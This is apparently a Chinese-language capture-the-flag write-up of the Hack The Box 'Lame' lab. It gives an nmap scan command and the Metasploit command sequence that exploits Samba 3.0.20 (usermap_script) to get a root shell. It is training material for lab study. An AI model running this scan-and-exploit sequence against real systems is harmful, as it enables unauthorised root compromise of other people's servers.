hack the box lame渗透过程

hack the box就不多介绍了。直接上题

1、信息收集

hack the box lame渗透过程_第1张图片
端口扫描
nmap -Pn -sV -sC -A -oN 10.10.10.3.txt 10.10.10.3

参数 作用
-Pn 如果主机禁用了ping请求,那么扫描将不能很好地进行下去。-Pn就是默认主机已经启动,并进行全套的检查工作
-sV 检查服务端的软件版本,可针对不同版本选择payload
-sC 脚本扫描
-A -sC、-sV、-O(检查操作系统),Traceroute
-oN 将扫描结果导入文件中

我们打开10.10.10.3.txt看看
hack the box lame渗透过程_第2张图片
ftp-anon:支持匿名登录。但是进去ftp看了一圈之后,并没有发现什么可用的信息。

2、漏洞利用

445端口 netbios-ssn Samba smbd 3.0.20-Debian
可见这个东西,正常情况下应该是要被关掉才安全的。既然我们知道了该服务开启,并有了版本号,msf启动。
hack the box lame渗透过程_第3张图片
msf搜索对用的payload

msfconsole
msf> search samba 3.0.20
查看列表,找到rank等级为excellent的payload
msf> use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
exploit
随后等待3秒,
id可以看到,现在服务器已经是root权限了
hack the box lame渗透过程_第4张图片
找到root.txt,flag到手
hack the box lame渗透过程_第5张图片
game over.

3、经验总结

1、端口扫描知识掌握
2、msf使用以及cve漏洞尝试
3、netbios-ssn Samba这个可能是绝大多数人没有防备,关掉的服务,感觉是个有用的侵入点

不算太难,但是先学套路,多见识题目

你可能感兴趣的:(web安全)